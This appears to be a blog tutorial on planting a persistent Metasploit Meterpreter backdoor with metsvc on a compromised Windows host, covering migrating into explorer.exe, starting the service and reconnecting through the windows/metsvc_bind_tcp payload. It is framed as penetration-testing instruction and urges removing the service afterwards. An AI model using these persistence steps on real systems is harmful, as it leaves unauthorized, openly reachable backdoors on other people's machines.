23rd October 2021

MSF Meterpreter Backdoor – What is metsvc?

After logging into the target system, one way to maintain persistence is to use the metsvc service. With this service, you can re-login Meterpreter whenever you want. Anyone who finds the corresponding port of the computer where you place this service can use this backdoor. You should cancel it after using it during the pentest process, otherwise, you will make the system open to malicious people. This will not please the system owners.

Meterpreter session

First of all, let’s open a meterpreter session using the module related to a gap you have found.

Meterpreter session
Meterpreter session

 

Let’s find the PID number of the Explorer.exe program with the ps command and switch to this PID numbered program with the migrate command.

 

LEARN MORE  Authorizing the Normal User to Take Computers to the Domain
msf ps and migrate
msf ps and migrate

 

metsvc -h

Before using the metsvc module, view the help and see what possibilities it offers us.

 

metsvc -h
metsvc -h

 

Run metsvc

metsvc is a program that normally provides backlinks to us, but since we are already logged in Meterpreter, we don’t need backlinks for now. Let’s just run the program.

 

LEARN MORE  Manually Remove McAfee EDR and McAfee Agent on Linux
Run metsvc
Run metsvc

 

Communication with metsvc Service

metsvc has started and is now waiting to connect. We can see how to communicate with this service.

We will use the payload module “windows/metsvc_bind_tcp” to communicate with metsvc in the listening state on the target system. We will activate the module as in the example below and make the necessary PORT settings.

Communication with metsvc Service
Communication with metsvc Service

 

PID number of metsvc service

As you can see, session 1 was opened automatically. We will look at which PID number the metsvc service runs on the target computer.

As can be seen from the printout, the metsvc program works with a 2560 PID number. Now, whenever you want, we can connect to the program listening on the target computer using the windows/metsvc_bind_tcp payload module.

Note: We recommend that you delete the metsvc program from the system when your security test is complete.

PID number of metsvc service
PID number of metsvc service

Leave a Reply

Your email address will not be published. Required fields are marked *